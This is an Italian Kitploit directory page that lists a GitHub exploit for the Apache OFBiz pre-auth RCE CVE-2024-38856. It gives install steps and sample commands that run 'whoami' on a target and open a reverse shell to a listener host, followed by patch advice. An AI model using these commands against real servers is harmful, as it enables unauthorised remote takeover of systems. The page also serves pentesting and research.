Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Apache-OFBiz-Exploit — Exploit per Apache OFBiz - CVE-2024-38856 | Kitploit
Strumenti/GitHubGitHub/alissonfaoli/apache-ofbiz-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubalissonfaoli/apache-ofbiz-exploit

Apache-OFBiz-Exploit

Exploit per Apache OFBiz - CVE-2024-38856

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Apache-OFBiz-Exploit

Exploit per Apache OFBiz (CVE-2024-38856) Di: Alisson Faoli

Descrizione

Questo repository contiene un exploit per la vulnerabilità CVE-2024-38856 trovata in Apache OFBiz. Il difetto consente RCE non autenticata (Remote Code Execution).

Nota: Questo exploit è fornito solo per scopi educativi e di ricerca. L'uso improprio può essere illegale ed è di esclusiva responsabilità dell'utente.

Dettagli della vulnerabilità

CVE: CVE-2024-38856

Software interessato: Apache OFBiz fino alla versione 18.12.14

Tipo di vulnerabilità: RCE

Sfruttamento: Autenticazione non richiesta

Riferimenti:

  • https://www.zscaler.com/blogs/security-research/cve-2024-38856-pre-auth-rce-vulnerability-apache-ofbiz
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-38856
  • https://www.cyfirma.com/research/cve-2024-38856-pre-authentication-remote-code-execution-rce-vulnerability-analysis-and-exploitation/

Utilizzo

Clona il repository:

root@kitploit:~
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit

Installa le dipendenze:

root@kitploit:~
pip install -r requirements.txt

Esegui l'exploit:

RCE: python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"

SHELL: python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444

Mitigazione

Per rimediare a questa vulnerabilità, si raccomanda agli amministratori di Apache OFBiz di: Aggiornare alla versione patchata disponibile su https://ofbiz.apache.org/download.html. Applicare regole firewall o WAF per bloccare i tentativi di sfruttamento noti.

Contatto

Se hai domande o desideri segnalare un miglioramento all'exploit, contattami: LinkedIn: https://linkedin.com/in/alisson-faoli/

Disclaimer legale:

Questo codice è fornito esclusivamente per scopi educativi e test di sicurezza in ambienti autorizzati. L'autore non è responsabile per qualsiasi uso improprio.

Scarica lo strumento